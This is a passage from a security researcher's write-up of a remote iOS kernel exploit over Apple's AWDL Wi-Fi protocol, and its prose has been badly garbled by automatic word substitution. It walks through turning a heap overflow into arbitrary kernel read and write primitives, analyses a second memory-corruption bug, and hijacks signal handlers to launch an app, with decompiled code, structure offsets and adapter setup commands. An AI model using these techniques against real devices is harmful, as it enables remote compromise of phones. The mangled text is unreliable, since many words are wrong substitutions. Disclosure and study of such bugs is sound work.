One more probability can also simply be to reason a form confusion. It’s which that that it is doubtless you’ll recall to mind that it is doubtless you’ll presumably perchance perchance presumably fetch a critical system with this form of frail nonetheless I figured I’d defend attempting to fetch one thing else.

At this point I began going by procedure of more AWDL code attempting to fetch all indirect writes I could presumably perchance perchance fetch. Being ready to write even an uncontrolled imprint to an arbitrary take care of is mostly an loyal stepping-stone to a chubby arbitrary memory write frail.

There could be one indirect write which stood out as particularly spirited; upright in the start of IO80211AWDLPeer::actionFrameReport:

  peer_manager=this->peer_manager;

  frame_len=mbuf_len(frame_mbuf);

  peer_manager->total_bytes_received +=frame_len;

  ++this->n_frames_in_last_second;

  per_second_timestamp=this->per_second_timestamp;

  absolute_time_now=mach_absolute_time();

  frames_in_last_second=this->n_frames_in_last_second;

  if ( ((absolute_time_now – per_second_timestamp) / 1000000)

        > 1024 )// more than 1024ms distinction

  {

    if ( frames_in_last_second>=0x21 )

      IO80211Understand::logDebug(

        (IO80211Understand *)this,

        “%s[%d] : Got %d Circulation Frames from ogle %02X:%02X:%02X:%02X:%02X:%02X in 1 2nd. Tainted Understandn”,

        “actionFrameReport”,

        1533LL,

        frames_in_last_second,

        this->peer_mac.octet[0],

        this->peer_mac.octet[1],

        this->peer_mac.octet[2],

        this->peer_mac.octet[3],

        this->peer_mac.octet[4],

        this->peer_mac.octet[5]);

    this->per_second_timestamp=mach_absolute_time();

    this->n_frames_in_last_second=1;

  }

  else if ( frames_in_last_second>=0x21 )

  {

    *(_DWORD *)(a2 + 20)=1;

    return 0;

  }

  … // proceed on to parse the physique

These first three lines of the decompiler output are precisely the roughly indirect write we’re attempting to fetch:

  peer_manager=this->peer_manager;

  frame_len=mbuf_len(frame_mbuf);

  peer_manager->total_bytes_received +=frame_len;

The peer_manager discipline is at offset +0x28 in the ogle object, without complications corruptible with the linear overflow. The total_bytes_received discipline is a u32 at offset +0x7c80 in the ogle supervisor, and frame_len is the length of the WiFi physique we ship so we can put this to an arbitrary imprint, albeit as a minimum 0x69 (the minimum AWDL physique size) and lower than 1200 (potentially better with fragmentation nonetheless it can presumably perchance perchance no longer attend a lot). That arbitrary imprint would then catch added to the u32 at offset +0x7c80 from the peer_manager pointer. This could perchance be enough to construct a byte-by-byte write of arbitrary memory, presuming you knew what modified into there ahead of:

By corrupting upper_peer‘s peer_manager pointer then spoofing a physique from upper_peer we can reason an indirect write by procedure of the corrupted peer_manager pointer. The peer_manager has a dword discipline at offset +0x7c80 which counts the total series of bytes obtained from all guests; actionFrameReport will add the length of the physique spoofed from upper_peer to the dword at the corrupted peer_manager pointer + 0x7c80 giving us an arbitrary add frail

We construct have a restricted learn frail already, doubtlessly enough to bootstrap ourselves to a chubby arbitrary learn and therefore chubby arbitrary write. We can certainly reach this code with a corrupted peer_manager pointer and catch an arbitrary add frail. There could be loyal one small difficulty, that can pick many more weeks to resolve: We will terror right away after the write.

Despite the indisputable truth that the IO80211AWDLPeer‘s peer_manager discipline doesn’t appear to be faded customarily in the background (unlike the vtable), the peer_manager discipline will likely be faded later on in the actionFrameReport capability, and since we’re attempting to write to arbitrary addresses this could perchance presumably perchance nearly with no doubt reason a terror.

Having a scrutinize at the code, there could be exclusively one stable course out of actionFrameReport:

  if ( ((absolute_time_now – per_second_timestamp) / 1000000)

        > 1024 )// more than 1024ms distinction

  {

    if (frames_in_last_second>=0x21)

      IO80211Understand::logDebug(

        (IO80211Understand *)this,

        “%s[%d] : Got %d Circulation Frames from ogle %02X:%02X:%02X:%02X:%02X:%02X in 1 2nd. Tainted Understandn”,

        “actionFrameReport”,

        1533LL,

        frames_in_last_second,

        this->peer_mac.octet[0],

        this->peer_mac.octet[1],

        this->peer_mac.octet[2],

        this->peer_mac.octet[3],

        this->peer_mac.octet[4],

        this->peer_mac.octet[5]);

    this->per_second_timestamp=mach_absolute_time();

    this->n_frames_in_last_second=1;

  }

  else if ( frames_in_last_second>=0x21 )

  {

    *(_DWORD *)(a2 + 20)=1;

    return 0;

  }

We have to reach that return 0 observation, that means we need the first if clause to be coarse, and the 2nd one to be comely.

The first observation checks whether more than 1024 ms have elapsed for the reason that per_second_timestamp modified into up in the past.

The 2nd observation checks whether more than 32 frames had been obtained for the reason that per_second_timestamp modified into closing up in the past.

So to reach the return 0 and steer particular of the panics due to an invalid peer_manager pointer we would favor to form sure that 32 frames had been obtained from the identical spoofed ogle internal a 1024ms period.

You is at risk of be optimistically beginning to scrutinize why the ACK sniffing mannequin vs the timing mannequin is favorable now; if the purpose had only obtained 31 frames then attempting the arbitrary add would reason a kernel terror.

Take that at this point on the opposite hand I’m the utilization of a 2.4Ghz only WiFi adaptor for injection and monitoring and the most spirited info price I will catch to work is 1Mbps. In actuality getting 33 frames onto the air internal 1024ms, particularly as only a allotment of that point will likely be AWDL Availability Windows, is at risk of be not doubtless.

Furthermore, as I all of sudden need a ways more accuracy by formulation of appealing whether frames had been obtained or no longer, I open to scrutinize how unreliable my video display instrument is. It looks to be customarily shedding frames, with an error price seemingly positively-correlated with how lengthy the adapter has been plugged in. After a whereas my testing mannequin entails having to unplug the injection and monitoring adaptors after every test to permit them to frigid down. This optimistically provides a taste of how anxious many ingredients of this exploit pattern processes had been. With out a stable and rapidly testing setup prototyping suggestions is painfully unhurried, and understanding whether an thought didn’t work is made tougher since you never know if your thought didn’t work, or if it modified into but every other hardware failure.

It’s doubtlessly not doubtless to form the timing checks pass the utilization of supposed behaviour with the present setup. However we aloof have a few tricks up our sleeve. We construct have a memory corruption vulnerability in any case.

Having a scrutinize at the two related fields per_second_timestamp and n_frames_in_last_second we scrutinize that they’re at the next offsets:

/+0x1648 */  struct ether_addr sync_tree_macs[10];

/+0x1684 */  uint8_t sync_error_count;

/+0x1685 */  uint8_t had_chanseq_tlv;

/+0x1686 */  uint8_t pad3[2];

/+0x1688 */  uint64_t per_second_timestamp;

/+0x1690 */  uint32_t n_frames_in_last_second;

/+0x1694 */  uint8_t pad21[4];

/+0x1698 */  void *steering_msg_blob;

/+0x16A0 */  uint32_t steering_msg_blob_size;

So the timestamp (which is absolute, no longer relative) and the physique depend are loyal after the sync tree buffer which we can overflow out of that means we can reliably rotten them and present a coarse timestamp and depend.

Arbitrary add thought 1: clock synchronization

My first thought modified into to set up out to resolve the delta between the purpose instrument’s absolute clock and the raspberry pi working the exploit. Then safely triggering an arbitrary add would be a 3 step direction of:

1) Compute a qualified per_second_timestamp imprint at some extent loyal in the long term and construct a short overflow internal upper_peer to give it that arbitrary timestamp and a excessive n_frames_in_last_second imprint.

2) Build a lengthy overflow from lower_peer to rotten upper_peer‘s peer_manager pointer to point 0x7c80 bytes below the arbitrary add purpose.

3) Spoof a physique from upper_peer the put the length corresponds to the size of the arbitrary add. As lengthy because the timestamp we wrote in step 1 is lower than 1024 ms sooner than the purpose instrument’s present present clock, and the n_frames_in_last_second is aloof big, we’ll hit the early error return course.

To drag this off we’ll favor to synchronize our clocks. AWDL itself is constructed on reliable timing and there are timing values in every AWDL physique. However they construct no longer undoubtedly attend us that a lot because these are relative timestamps whereas we need absolute timestamps.

Fortunately we have already bought a restricted learn frail, and undoubtedly we have already unintentionally faded it to leak a timestamp:

The identical annotated hexdump from the initial learn frail when it figured out two neighbouring guests. At offset +0x43 in the dump we can scrutinize the per_second_timestamp imprint. We could presumably perchance perchance now enjoy to leak with no doubt one of these which we power to be put at an proper moment in time

We can utilize the initial restricted arbitrary learn frail again below more controlled conditions to set up out to resolve the clock delta enjoy this:

1) Wait 1024 ms.

2) Spoof a physique from lower_peer, that can reason it to catch a novel per_second_timestamp.

3) After we fetch an ACK, portray the present timestamp on the raspberry pi.

4) Employ the BSS Guidance learn to learn lower_peer‘s timestamp.

5) Convert the two timestamps to the identical objects and compute the delta.

Now we can fetch the arbitrary write as described above by the utilization of the SyncTree overflow internal upper_peer to give it a coarse and expert per_second_timestamp and n_frames_in_last_second imprint. This works, and we can add an arbitrary byte to an arbitrary take care of!

Unfortunately it be no longer very legitimate. There are too many things to lope harmful right here, and for a painful couple of weeks every thing went harmful. Within the start, as previously talked about, the injection and monitoring hardware is loyal too unreliable. If we miss ACKs we discontinue up getting the clock delta harmful, and if the clock delta is too harmful we’ll terror the purpose. Also, we’re aloof sending frames very slowly, and the slower this all occurs the lower the probability that our coarse timestamp stays expert by the time it be faded. We need an procedure which goes to work a ways more reliably.

Having to synchronize the clocks is fragile. Having a scrutinize more closely at the code, I realized there modified into every other formulation to reach the error bail out course without manually syncing.

If we wait 1024ms then spoof a physique, the ogle structure will catch a novel timestamp that can pass the timestamp test for the next 1024ms. 

We can no longer construct that and then overflow into the n_frames_in_last_second discipline, because that discipline is after the per_second_timestamp so we would rotten it. However there could be de facto a formulation to rotten the n_frames_in_last_second discipline without touching the timestamp:

1) Wait 1024ms then spoof a qualified physique from upper_peer, giving its IO80211AWDLPeer object a qualified per_second_timestamp.

2) Overflow from lower_peer into upper_peer, environment upper_peer‘s peer_manager pointer to 0x7c80 bytes ahead of upper_peer‘s frames_in_last_second counter.

3) Spoof a qualified physique from upper_peer.

Let’s scrutinize more closely at precisely what is going to happen now:

It’s now the case that this->peer_manager suggestions 0x7c80 ahead of ogle->n_frames_in_last_second when IO80211AWDLPeer::actionFrameReport gets called on upper_peer:

  peer_manager=this->peer_manager;

  frame_len=mbuf_len(frame_mbuf);

Because we have corrupted upper_peer‘s peer_manager pointer, peer_manager->total_bytes_received overlaps with upper_peer->n_frames_in_last_second, that means this add will add the physique length to upper_peer->n_frames_in_last_second! The well-known section is that this write occurs ahead of n_frames_in_last_second is checked!

  peer_manager->total_bytes_received +=frame_len;

  ++this->n_frames_in_last_second;

  per_second_timestamp=this->per_second_timestamp;

  absolute_time_now=mach_absolute_time();

  frames_in_last_second=this->n_frames_in_last_second;

And if we’re rapidly enough we’ll aloof pass this test, because we have an genuine timestamp:

  if ( ((absolute_time_now – per_second_timestamp) / 1000000)

        > 1024 )// more than 1024ms distinction

  {

     …

  }

and now we’ll moreover pass this test and return:

  else if ( frames_in_last_second>=0x21 )

  {

    *(_DWORD *)(a2 + 20)=1;

    return 0;

  }

We have bought a timestamp aloof expert for some allotment of 1024ms and n_frames_in_last_second is extremely big, without needing to ship that many frames for the period of the 1024ms window or having to manually synchronize the clocks.

The fourth step is then to overflow again from lower_peer to upper_peer, this time pointing peer_manager to 0x7c80 below the desired add purpose. Ultimately, spoof a physique from upper_peer, padded to the upright size for the desired add imprint.

The final timing trick for now modified into to treasure shall we skip the initial 1024ms wait by first overflowing internal upper_peer to construct its timestamp to 0. Then the next expert physique spoofed from upper_peer would guarantee to construct a qualified per_second_timestamp usable for the next 1024 ms. On this form we can utilize the arbitrary write rather rapidly, and start building our subsequent frail. With the exception of…

Earlier I unintentionally figured out every other exploitable zero day. Fortunately it modified into rather easy to manual particular of triggering it, nonetheless my exploit persisted to terror the purpose instrument in a huge quantity of techniques. In spite of every thing, as ahead of, I’d form of rely on this and certainly I worked out a few techniques wherein I modified into potentially inflicting panics.

One modified into that once I modified into overwriting the peer_manager pointer I modified into moreover overwriting the flink and blink pointers of the ogle in the linked list of guests. If guests had been added or a ways off from the list since I had taken the copy of these pointers I could presumably perchance perchance now be corrupting the list, potentially adding support historical pointers or altering the expose. This modified into inch to reason complications so I added a workaround: I’d form sure that no spoofed guests ever bought freed. Right here is easy to enforce; loyal form sure every ogle spoofs a physique round every 20 seconds or so and likewise it is doubtless you’ll presumably perchance be fair.

However my test instrument modified into aloof panicking, so I particular to essentially dig into one of the panics and work out precisely what looks to be occurring. Am I unintentionally triggering but every other zero-day?

After a day or so of prognosis and reversing I imprint that yes, that is undoubtedly every other exploitable zero-day in AWDL. Right here is the third, moreover reachable in the default configuration of iOS.

This vulnerability took a glorious deal more effort to imprint than the double free. The location is more subtle and boils all of the formulation down to a failure to particular a flag. With out a upfront info of the names or applications of these flags (and there are heaps of of flags in AWDL) it required rather a few painstaking reverse engineering to work out what goes on on. Let’s dive in.

resetAndRemovePeerInfo is a member activity of the IO80211PeerBssSteeringManager. It’s called when a ogle is being destructed:

IO80211PeerBssSteeringManager::resetAndRemovePeerInfo(

  IO80211AWDLPeer *ogle) {

  struct BssSteeringCntx *cntx;

  if (!ogle) {

    // log error and return

  }

  ogle->added_to_fw_cache=0;

  struct BssSteeringCntxcntx=this->steering_cntx;

  if (cntx->peer_count) {

    for (uint64_t i=0; i peer_count; i++) {

      if (memcmp(&cntx->peer_macs[i], &ogle->peer_mac, 6uLL)==0) {

        memset(&cntx->peer_macs[i], 0, 6uLL); 

      }

    };

  }

  cntx->peer_count–;

}

We can scrutinize a callsite right here in IO80211AWDLPeerManager::removePeer:

if (ogle->added_to_fw_cache) {

  if (this->steering_manager)  {

    this->steering_manager->resetAndRemovePeerInfo(ogle);

  }

}

added_to_fw_cache is a reputation I undoubtedly have given to the flag discipline at +0x4b8 in IO80211AWDLPeer. We can scrutinize that if a ogle with that flag put is destructed then the ogle supervisor will call the steering_manager‘s resetAndRemovePeerInfo capability shown above.

resetAndRemovePeerInfo clears that flag then iterates by procedure of the guidance context object’s array of for the time being-being-instructed ogle MAC addresses. If the ogle being destructed’s MAC take care of is explain in there, then it be memset to 0.

The logic already looks barely of outlandish; they decrement peer_count nonetheless construct no longer shrink the size of the array by swapping the empty slot with the closing expert entry, that means this could perchance presumably perchance only work accurately if the guests are destructed in the particular reverse expose that they had been added. Kinda irregular, nonetheless doubtlessly no longer a safety vulnerability.

The logic of this option capability peer_count will likely be decremented at any time when it runs. However what would happen if this option had been called more cases than the initial imprint of peer_count? Within the first extra invocation the memcmp loop would no longer construct and peer_count would be decremented from 0 to 0xffffffff, nonetheless in the 2nd extra invocation, the peer_count is non-zero, so it can presumably perchance perchance enter the memcmp/memset loop. However the most spirited loop termination situation is i>=peer_count, so this loop will strive to streak 4 billion cases, with no doubt going off the discontinue of the 8 entry peer_macs array:

struct __attribute__((packed)) BssSteeringCntx {

/+0x0000 */  uint32_t first_field;

/+0x0004 */  uint32_t service_type;

/+0x0008 */  uint32_t peer_count;

/+0x000C */  uint32_t role;

/+0x0010 */  struct ether_addr peer_macs[8];

/+0x0040 */  struct ether_addr infraBSSID;

/+0x0046 */  uint8_t pad4[6];

/+0x004С */  uint32_t infra_channel_from_datapath_tlv;

/+0x0050 */  uint8_t pad8[8];

/+0x0058 */  char ssid[32];

/+0x0078 */  uint8_t pad1[12];

/+0x0084 */  uint32_t num_peers_added_to_umi;

/+0x0088 */  uint8_t pad_10;

/+0x0089 */  uint8_t pendingTransitionToNewState;

/+0x008А */  uint8_t pad7[2];

/+0x008C */  enum BSSSteeringState current_state;

/+0x0090 */  uint8_t pad5[8];

/+0x0098 */  struct IOTimerEventSource *bssSteeringExpiryTimer;

/+0x00A0 */  struct IOTimerEventSource *bssSteeringStageExpiryTimer;

/+0x00A8 */  uint8_t pad9[8];

/+0x0000 */  uint32_t steering_policy;

/+0x00B4 */  uint8_t inProgress;

}

My reverse engineered version of the BSS Guidance context object. I’ve managed to name many of the fields.

Right here is exclusively a vulnerability if it be which that that it is doubtless you’ll recall to mind to call this option peer_count+2 cases. (To decrement peer_count all of the formulation down to 0, then put it to -1, then re-enter with peer_count=-1.)

Whether or no longer or no longer resetAndRemovePeerInfo is called when a ogle is destructed relies upon only on whether that ogle has the added_to_fw_cache flag put; this provides us an inequality: the series of ogle’s with added_to_fw_cache put ought to be lower than or equal to peer_count+1. Potentially it be undoubtedly supposed to be the case that peer_count desires to be equal to the series of guests with that flag put. Is that the case?

No, it be no longer. After guidance fails we restart the BSS Guidance pronounce machine by sending a brand contemporary BSSSteering TLV with a steeringMsgID of 6 rather then 0; this implies the guidance pronounce machine gets a BSS_STEERING_REMOTE_STEERING_TRIGGER tournament rather then the BSS_STEERING_RECEIVED_DIRECTED_STEERING_CMD which modified into faded to begin it. This resets the guidance context object, filling the peer_macs array with irrespective of contemporary ogle macs we specify in the contemporary DIRECTED_STEERING_CMD TLV. If we specify various guests to these already in the context’s peer_macs array, then these aged entries’ corresponding IO80211AWDLPeer objects construct no longer have their added_to_fw_cache discipline cleared, nonetheless the contemporary guests construct catch that flag put.

This implies that the series of guests with the flags put becomes better than context->peer_count, in expose the guests at closing catch destructed peer_count goes all of the formulation down to zero, underflows then causes memory corruption.

I modified into hitting this situation at any time once I restarted guidance, though it can presumably perchance perchance pick a whereas for the instrument to essentially kernel terror for the reason that instructed guests wanted to timeout and catch destructed.

Root inflicting this 2nd bonus remotely-triggerable iOS kernel memory corruption modified into a lot tougher than the first bonus double-free; the rationalization given above took a few days work. It modified into well-known though as I needed to work round both of these vulnerabilities to form sure I didn’t unintentionally trigger them, which in entire added a first-rate quantity of extra work. 

The work-round in this case modified into to form sure that I only ever restarted guidance the identical guests; with that trade we no longer hit the peer_count underflow and only rotten the memory we’re attempting to rotten! This difficulty modified into fastened in iOS 13.6 as CVE-2020-9906.

The purpose is no longer randomly kernel panicking even once we construct no longer trigger the supposed Sync Tree heap overflow, so let’s catch support to the exploit.

We have an arbitrary add frail nonetheless it be no longer rather an arbitrary write but. For that, we favor to perceive the genuine values so we can compute the upright per-byte physique sizes to overflow every byte to write a undoubtedly arbitrary imprint.

Potentially we’ll have to make utilize of the arbitrary add to rotten one thing in a ogle or the ogle supervisor such that we can catch it to utilize an arbitrary pointer when building an MI or PSF physique that will most likely be despatched over the air.

I went support to IDA and spent a in point of fact lengthy time wanting by procedure of code to perceive this form of frail, and figured out one in the construction of the Carrier Ask Descriptor TLVs in MI frames:

IO80211AWDLPeerManager::buildMasterIndicationTemplate

  (char *buffer, u32 total_size …

  req_desc=this->req_desc;

  if ( req_desc ){

    desc_len=req_desc->desc_len;        // length

    desc_ptr=req_desc->desc_ptr;

    tlv_len=desc_len+4;

    if (desc_len && desc_ptr && tlv_len

      buffer[offset]=16; // type

      *(u16*)&buffer[offset+1]=desc_len + 1; // len

      buffer[current_buffer_offset+3]=3;

      IO80211ServiceRequestDescriptor::copyDataOnly(

        req_desc,

        &buffer[offset+4],

        total_size – offset – 4);

    }

This is reading an IO80211ServiceRequestDescriptor object pointer from the peer manager from which it reads another pointer and a length. If there’s space in the MI frame for that length of buffer then it calls the RequestDescriptor‘s copyDataOnly method, which simply copies from the RequestDescriptor into the MI frame template. It’s only reading these two pointer and length fields which are at offset +0x40 and +0x54 in the request descriptor, so by pointing the IO80211AWDLPeerManager‘s req_desc pointer to data we control we can cause the next MI template which is generated to contain data read from an arbitrary address, this time with no restrictions on the data being read.

We can use the limited read primitive we currently have to read the existing value of the req_desc pointer, we just need to find somewhere below it in the peer_manager object where we know there will always be a fixed, small dword we can use as the length value needed for the read. Indeed, a few bytes below this there is such a value.

The first trick is in choosing somewhere to point the req_desc pointer to. We want to choose somewhere where we can easily update the read target without having to trigger the memory corruption. From reading the TLV parsing code I knew there were some TLVs which have very little processing. A good example, and the one I chose to use, is the NSync TLV. The only processing is to check that the total TLV length including the header is less than or equal to 0x40. That entire TLV is then memcpy‘ed into a 0x40 byte buffer in the peer object at offset +0x4c4:

memcpy(this->nsync_tlv_buf, tlv_ptr, tlv_total_len);

We can utilize the arbitrary write to point the peer_manager‘s req_desc pointer to loyal below the lower_peer‘s nsync_tlv buffer such that by spoofing NSync TLVs from lower_peer we can replace the coarse descriptor pointer and length values.

Some care desires to be taken when corrupting the req_desc pointer on the opposite hand as we can for the time being only construct byte-by-byte writes and the req_desc pointer is at risk of be learn whereas we are corrupting it. We therefore want a formulation to discontinue these reads.

IO80211AWDLPeerManager::updateBroadcastMI is on the excessive course for the learn, that means that at any time when the MI physique is up in the past it must battle by procedure of this option, which contains the next test:

if (this->frames_outstanding frames_limit) {

  IO80211AWDLPeerManager::updatePrimaryPayloadMI(…

frames_limit is initialized to a put imprint of three. If we first utilize the arbitrary add to form frames_outstanding very big, this test will fail and the MI template can also simply no longer be up in the past, and the req_desc member can also simply no longer be learn. Then after we’re carried out corrupting the req_desc pointer we can put this imprint support to its usual imprint and the MI templates will likely be up in the past again and the arbitrary learn will work.

A truly easy formulation to set that is to be able to add 0x80 to the most-fundamental byte of frames_outstanding. The first time we construct this this could perchance presumably perchance form frames_outstanding very big. If it had been 2 to open with it can presumably perchance perchance lope from: 0x00000002 to 0x80000002.

Including 0x80 to that MSB as 2nd time would reason it to then overflow support 0, resetting the imprint to 2 again. This needless to claim has the facet construct of adding 1 to the next dword discipline in the peer_manager when it overflows, nonetheless fortunately this doesn’t reason any complications.

Now by spoofing an NSync TLV from lower_peer and monitoring for a trade in the contents of the 0x10 TLV despatched by the purpose in MI frames we can learn arbitrary kernel info from arbitrary addresses.

Now we have a undoubtedly arbitrary learn, nonetheless sadly it is miles mostly barely unhurried. Usually it takes a few seconds for the MI template to be up in the past. What we need is a formulation to power the MI template to be regenerated on build a matter to.

Having a scrutinize by procedure of the inferior references to IO80211AWDLPeerManager::updateBroadcastMI I realized that it looks the MI template gets regenerated at any time when the ogle bloom filter gets up in the past in IO80211AWDLPeerManager::updatePeerListBloomFilter. As we saw a lot earlier in this put up, and I had particular months ahead of this point, the bloom filter code is rarely always faded. However… we have an arbitrary add so shall we loyal flip it on!

Indeed, by flipping the flag at +0x5950 in the IO80211AWDLPeerManager we can enable the ogle bloom filter code.

With ogle bloom filters enabled at any time when the purpose sees a brand contemporary ogle, it regenerates the MI template in expose to form sure it be broadcasting an up-to-date bloom filter containing all of the guests it knows about (or as a minimum the first 256 in the ogle list.) This means we can form our arbitrary learn a lot a lot sooner: we loyal favor to ship the upright NSync TLV containing our learn purpose then spoof a brand contemporary ogle and anticipate an up in the past MI. With this device entire we can learn arbitrary faraway kernel memory over the air at a price of many kilobytes per 2nd.

At this point we can manufacture the contemporary abstraction layer faded by a local privilege escalation exploit, excluding this time it be faraway.

The considerable kernel memory learn feature is:

voidrkbuf(uint64_t kaddr, uint32_t len);

With some helpers to form the code much less complicated:

uint64_t rk64(uint64_t kaddr);

uint32_t rk32(uint64_t kaddr);

uint8_t rk8(uint64_t kaddr);

Equally for writing kernel memory, we have the important thing write capability:

void wk8(uint64_t kaddr, uint8_t desired_byte);

and a few helpers:

void wkbuf(uint64_t kaddr, uint8_tdesired_value, uint32_t len);

void wk64(uint64_t kaddr, uint64_t desired_value);

void wk32(uint64_t kaddr, uint32_t desired_value);

From this point the exploit code begins to scrutinize procedure more enjoy a recent local privilege escalation exploit and the faraway part is quite entirely abstracted away.

Right here is already enough to pop calc. To set that we loyal want a formulation to inject a defend watch over drift edge into userspace in some way. A little bit of of grepping by procedure of the XNU code and I stumbled across the code facing BSD mark supply which gave the influence promising.

Every direction of structure has an array of mark handlers; one per mark quantity.

struct sigacts {

  user_addr_t ps_sigact[NSIG];   /disposition of indicators */

  user_addr_t ps_trampact[NSIG]; /disposition of indicators */

  …

The ps_trampact array incorporates userspace feature pointers. When the kernel wants a userspace direction of to address a mark it looks up the mark quantity in that array:

  trampact=ps->ps_trampact[sig];

then sets the userspace thread’s pc pc pc imprint to that:

  sendsig_set_thread_state64(

    &ts.ts64.ss,

    catcher,

    infostyle,

    sig,

    (person64_addr_t)&((struct user_sigframe64*)sp)->sinfo,

    (person64_addr_t)p_uctx,

    token,

    trampact,

    sp,

    th_act)

Where sendsig_set_thread_state64 looks enjoy this:

static kern_return_t

sendsig_set_thread_state64(arm_thread_state64_t *regs,

                           person64_addr_t catcher,

                           int infostyle,

                           int sig,

                           person64_addr_t p_sinfo,

                           person64_addr_t p_uctx,

                           person64_addr_t token,

                           person64_addr_t trampact,

                           person64_addr_t sp,

                           thread_t th_act) {

  regs->x[0]=catcher;

  regs->x[1]=infostyle;

  regs->x[2]=sig;

  regs->x[3]=p_sinfo;

  regs->x[4]=p_uctx;

  regs->x[5]=token;

  regs->pc pc pc=trampact;

  regs->cpsr=PSR64_USER64_DEFAULT;

  regs->sp=sp;

  return thread_setstatus(th_act,

                          ARM_THREAD_STATE64,

                          (void *)regs,

                          ARM_THREAD_STATE64_COUNT);

}

The catcher imprint in X0 is moreover entirely controlled, learn from the ps_sigact array.

Show camouflage that the kernel APIs for environment userspace register values construct no longer require userspace pointer authentication codes.

We can put X0 to the constant CFStringcom.apple.calculator” already present in the dyld_shared_cache. On 13.3 on the 11 Expert that is at 0x1BF452778 in an unslid shared cache.

We put PC to this device in CommunicationSetupUI.framework:

MOV  W1, #0

BL   _SBSLaunchApplicationWithIdentifier

This clears W1 then calls SBSLaunchApplicationWithIdentifier, a Springboard Companies Framework non-public API for launching apps.

The final piece of this puzzle is finding a direction of to inject the coarse mark into. It desires to have the com.apple.springboard.launchapplications entitlement in expose for Springboard to direction of the begin demand. Using Jonathan Levin’s entitlement database it be easy to search out the list of injection candidates.

We remotely traverse the linked list of working processes attempting to fetch a victim, put a coarse mark handler then form a thread in that direction of give it some thought has to address a mark by OR’ing in the upright mark quantity in the uthread‘s siglist bitmap of pending indicators:

wk8(uthread+0x10c+3, 0x40); // uthread->siglist

and indirectly making the thread give it some thought desires to address a BSD AST:

wk8_no_retry(thread+0x2e8, 0x80); // thread->act |=AST_BSD

Now, when this thread gets scheduled and tries to facing pending ASTs, this could perchance presumably perchance strive to address our coarse mark and a calculator will seem:

An iPhone 11 Expert working Calculator.app with a video display in the background exhibiting the output from the final stage of the AWDL exploit

We have popped calc, we’re carried out! Or are we? It’s kinda unhurried, and there will not be any actual rationalization for it to be so unhurried. We managed to manufacture rather a rapidly arbitrary learn frail so as that’s no longer the bottleneck. The considerable bottleneck for the time being is the initial BSS Guidance-basically based learn. It’s taking 8 seconds per learn since it wants the pronounce machine to time out between every strive.

As we saw, on the opposite hand, the BSS Guidance TLV signifies that we desires to be ready to manual up to 8 guests at the identical time, that means that we desires to be ready to enhance our learn tempo by as a minimum 8x. Of direction, if we can catch away with 8 or fewer initial reads our learn tempo can also simply be a lot sooner than that.

Alternatively, must you strive to manual 8 guests simultaneously, it doesn’t rather work as expected:

When more than one guests are instructed the UMIs flood the airwaves. On this instance I modified into guidance 8 guests nonetheless the frames are dominated by UMIs to the first ogle. You also can scrutinize a handful of UMIs to : 06, and one to : 02 amongst the dozens to : 00.

Testing against MacOS we moreover scrutinize the next log message:

Understand 22: 22:aa: 22: 00: 00 DID NOT ack our UMI

When the purpose tries to manual 8 guests at the identical time it begins flooding the airwaves with UMI frames directed at the purpose guests – so many undoubtedly that it never undoubtedly manages to ship the UMIs for all 8 guidance targets ahead of timing out.

We have already covered stall the initial sending of UMIs by controlling the channel sequence, nonetheless it looks enjoy we’re moreover going to have to ACK the UMI frames.

As we saw earlier, ACKs in 80211.a and g are timing basically based. To ACK a physique it’s good to to ship the ACK in the short window following the transmission of the physique. We no doubt can no longer construct that the utilization of libpcap, the timing wants microsecond precision. We doubtlessly can no longer even construct that with a customised kernel driver.

There could be on the opposite hand an obscure WiFi adaptor video display mode feature called “Energetic Show screen Mode”, supported by only a few chipsets.

Energetic video display mode allows you to inject and video display arbitrary frames as in vogue, excluding in full of life video display mode (as against contemporary video display mode) the adaptor will aloof ACK frames in the event that they’re being despatched to its MAC take care of.

The Mediatek MT76 chipset modified into the most spirited one I could presumably perchance perchance fetch with a USB adaptor that helps this option. I provided a bunch of MT76-basically based adaptors and the most spirited one the put I could presumably perchance perchance undoubtedly catch this option to work modified into the ZyXEL NWD6605 which uses an mt76x2u chipset.

The one difficulty modified into that I could presumably perchance perchance only catch Energetic Show screen Mode to essentially work when working at 12 Mbps on a 5GHz channel nonetheless my present setup modified into the utilization of adaptors which had been now unable to 5GHz injection.

I had tried upright support at the starting of the exploit pattern direction of to catch 5GHz injection and monitoring to work; after attempting for a week with hundreds adaptors and building many, many branches of kernel drivers and twiddling with radiotap headers I had given up and made up our minds to be aware of getting one thing working on 2.4GHz with my aged adaptors.

This time round I loyal provided all of the adaptors I could presumably perchance perchance fetch which looked enjoy they would perchance presumably also simply have even the remotest probability of working and tried again.

One amongst the challenges is that OEMs can also simply no longer consistently utilize the identical chipset or revision of chipset in a instrument, that means getting defend of a specific chipset and revision is mostly a success-and-miss direction of.

Listed right here are all of the adaptors which I faded for the period of this exploit to set up out to search out enhance for the ingredients I wished:

The total WiFi adaptors tested for the period of this exploit pattern direction of, from high left to bottom upright: D-Hyperlink DWA-125, Netgear WG111-v2, Netgear A6210, ZyXEL NWD6605, ASUS USB-AC56, D-Hyperlink DWA-171, Vivanco 36665, tp-hyperlink Archer T1U, Microsoft Xbox wireless adaptor Model 1790, Edimax EW-7722UTn V2, FRITZ!WLAN AC430M, ASUS USB-AC68, tp-hyperlink AC1300

Within the discontinue I required two various adaptors to catch the ingredients I wished:

Energetic video display mode and physique injection: ZyXEL NWD6605 the utilization of mt76x2u driver

Show screen mode (in conjunction with management and ACK frames): Netgear A6210 the utilization of rtl8812au driver

With this setup I modified into ready to catch physique injection, video display mode sniffing of all frames in conjunction with management and ACK frames as effectively as Energetic video display mode to work at 12 Mbps on channel 44.

You also can enable the feature enjoy this:

ip hyperlink put dev wlan1 down

iw dev wlan1 put form video display

iw dev wlan1 put video display full of life defend watch over otherbss

ip hyperlink put dev wlan1 up

iw dev wlan1 put channel 44

We can trade the cardboard’s MAC take care of the utilization of the ip instrument enjoy this:

ip hyperlink put dev wlan1 down

ip hyperlink put wlan1 take care of 44: 44: 22: 22: 22: 22

ip hyperlink put dev wlan1 up

Altering the MAC take care of enjoy this takes as a minimum a 2nd and the interface has to be down. Since we’re attempting to form these reads as rapidly as which that that it is doubtless you’ll recall to mind I particular to pick out a scrutinize at how this mac take care of changing undoubtedly worked to scrutinize if I could presumably perchance perchance tempo it up…

3 techniques to construct a MAC: 1 – ioctl

The aged formulation to construct a network instrument MAC take care of is to make utilize of the SIOCSIFHWADDR ioctl:

struct ifreq ifr={0};

uint8_t mac[6]={0x22, 0x23, 0x24, 0x00, 0x00, 0x00};

